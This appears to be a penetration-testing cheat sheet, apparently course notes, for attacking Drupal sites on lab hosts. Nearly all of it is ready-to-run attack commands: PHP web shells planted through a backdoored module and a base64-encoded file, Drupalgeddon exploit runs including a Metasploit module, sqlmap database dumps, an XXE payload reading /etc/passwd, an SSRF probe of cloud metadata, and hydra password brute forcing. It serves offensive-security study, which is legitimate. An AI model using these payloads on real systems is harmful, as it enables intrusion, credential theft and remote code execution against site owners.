6. Attacking Drupal

1. PHP Filter Module Exploitation (Drupal < 8)

curl -s http://drupal-qa.inlanefreight.local/node/3?dcfdd5e021a869fcc6dfaef8bf31377e=id

Enable PHP filter module, inject code via content.
Consideration: Client communication before enabling modules.

2. Backdoored Module Upload

wget --no-check-certificate https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
tar xvf captcha-8.x-1.2.tar.gz
echo '<?php system($_GET[fe8edbabc5c5c9b7b764504cd22b17af]);?>' > captcha/shell.php
echo '<IfModule mod_rewrite.c>RewriteEngine On;RewriteBase /</IfModule>' > captcha/.htaccess
tar cvf captcha.tar.gz captcha/captcha/
curl -s drupal.inlanefreight.local/modules/captcha/shell.php?fe8edbabc5c5c9b7b764504cd22b17af=id

Upload malicious module via admin panel.
Consideration: Avoid modifying production systems without explicit permission.

3. Drupalgeddon (CVE-2014-3704)

python2.7 drupalgeddon.py -t http://drupal-qa.inlanefreight.local -u hacker -p pwnd

Create admin user via SQL injection.
Consideration: Impact of creating unauthorized admin accounts.

4. Drupalgeddon2 (CVE-2018-7600)

python3 drupalgeddon2.py
echo "PD9waHAgc3lzdGVtKCRfR0VUW2ZlOGVkYmFiYzVjNWM5YjdiNzY0NTA0Y2QyMmIxN2FmXSk7Pz4K" | base64 -d | tee mrb3n.php
curl http://drupal-dev.inlanefreight.local/mrb3n.php?fe8edbabc5c5c9b7b764504cd22b17af=id

RCE via user registration form.
Consideration: Severity of unauthenticated RCE vulnerabilities.

5. Drupalgeddon3 (CVE-2018-7602)

msf6 > use exploit/multi/http/drupal_drupageddon3
msf6 > set rhosts 10.129.42.195
msf6 > set VHOST drupal-acc.inlanefreight.local
msf6 > set drupal_session SESS...
msf6 > set DRUPAL_NODE 1
msf6 > set LHOST 10.10.14.15
msf6 > exploit

RCE via Form API (requires authenticated session).
Consideration: Session hijacking risks.

6. Drupal Configuration File Exploitation/Security

curl -s http://drupal.inlanefreight.local/sites/default/settings.php
ls -l sites/default/settings.php
cat .htaccess

Check for exposed settings.php, extract database credentials.
Consideration: Secure configuration file permissions and access.

7. Database Exploitation (SQL Injection - Expanded)

curl "http://drupal.inlanefreight.local/node/1?id=1'--"
curl "http://drupal.inlanefreight.local/node/1?id=1' OR '1'='1"
sqlmap -u "http://drupal.inlanefreight.local/node/1?id=1" --dbs --batch
sqlmap -u "http://drupal.inlanefreight.local/node/1?id=1" -D [database_name] --tables --batch
sqlmap -u "http://drupal.inlanefreight.local/node/1?id=1" -D [database_name] -T [table_name] --columns --batch
sqlmap -u "http://drupal.inlanefreight.local/node/1?id=1" -D [database_name] -T [table_name] -C [column1,column2] --dump --batch
sqlmap -u "http://drupal.inlanefreight.local/node/1?id=1" --level 5 --risk 3

Manual and automated SQL injection testing.
Consideration: Validate findings with alternative tools.

8. Form API Exploitation

curl -X POST -d "param1=value1&param2=payload" http://drupal.inlanefreight.local/form_path

Consideration: Burp Suite is very helpful for deeper analysis.

9. File Upload Vulnerabilities

curl -F "file=@malicious.php" http://drupal.inlanefreight.local/upload_path

Test various file extensions.
Consideration: Look for MIME type enforcement.

10. Access Control Vulnerabilities

curl -I http://drupal.inlanefreight.local/admin

Check for 200 response when not authenticated.
Consideration: Test different user roles.

11. Session Management Vulnerabilities

Use Burp Suite's Sequencer and Session handling rules.

12. XML External Entity (XXE) Injection

curl -X POST -H "Content-Type: application/xml" -d '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><foo>&xxe;</foo>' http://drupal.inlanefreight.local/xml_endpoint

13. Server-Side Request Forgery (SSRF)

curl "http://drupal.inlanefreight.local/page?url=http://169.254.169.254/latest/meta-data/"

Consideration: Check response for internal metadata leaks.

14. Drupal Brute Forcing

wpscan --url http://drupal.inlanefreight.local/ --enumerate u --passwords /usr/share/wordlists/rockyou.txt
hydra -l admin -P /usr/share/wordlists/rockyou.txt drupal.inlanefreight.local http-post-form "/user/login:name=^USER^&pass=^PASS^&form_id=user_login:Invalid username or password"

Consideration: Use specific tools for Drupal authentication mechanisms.

Additional Notes:

Ensure Drupal versions are known before testing specific exploits.
Use enumeration tools like droopescan for discovering modules and themes.
Test patches and mitigations post-exploitation to ensure security fixes.

Previous5. Drupal Discovery And Enumeration Next2. Servlet Containers and Software Development

Last updated 19 days ago

hashtag1. PHP Filter Module Exploitation (Drupal < 8)

hashtag2. Backdoored Module Upload

hashtag3. Drupalgeddon (CVE-2014-3704)

hashtag4. Drupalgeddon2 (CVE-2018-7600)

hashtag5. Drupalgeddon3 (CVE-2018-7602)

hashtag6. Drupal Configuration File Exploitation/Security

hashtag7. Database Exploitation (SQL Injection - Expanded)

hashtag8. Form API Exploitation

hashtag9. File Upload Vulnerabilities

hashtag10. Access Control Vulnerabilities

hashtag11. Session Management Vulnerabilities

hashtag12. XML External Entity (XXE) Injection

hashtag13. Server-Side Request Forgery (SSRF)

hashtag14. Drupal Brute Forcing

hashtagAdditional Notes:

1. PHP Filter Module Exploitation (Drupal < 8)

2. Backdoored Module Upload

3. Drupalgeddon (CVE-2014-3704)

4. Drupalgeddon2 (CVE-2018-7600)

5. Drupalgeddon3 (CVE-2018-7602)

6. Drupal Configuration File Exploitation/Security

7. Database Exploitation (SQL Injection - Expanded)

8. Form API Exploitation

9. File Upload Vulnerabilities

10. Access Control Vulnerabilities

11. Session Management Vulnerabilities

12. XML External Entity (XXE) Injection

13. Server-Side Request Forgery (SSRF)

14. Drupal Brute Forcing

Additional Notes: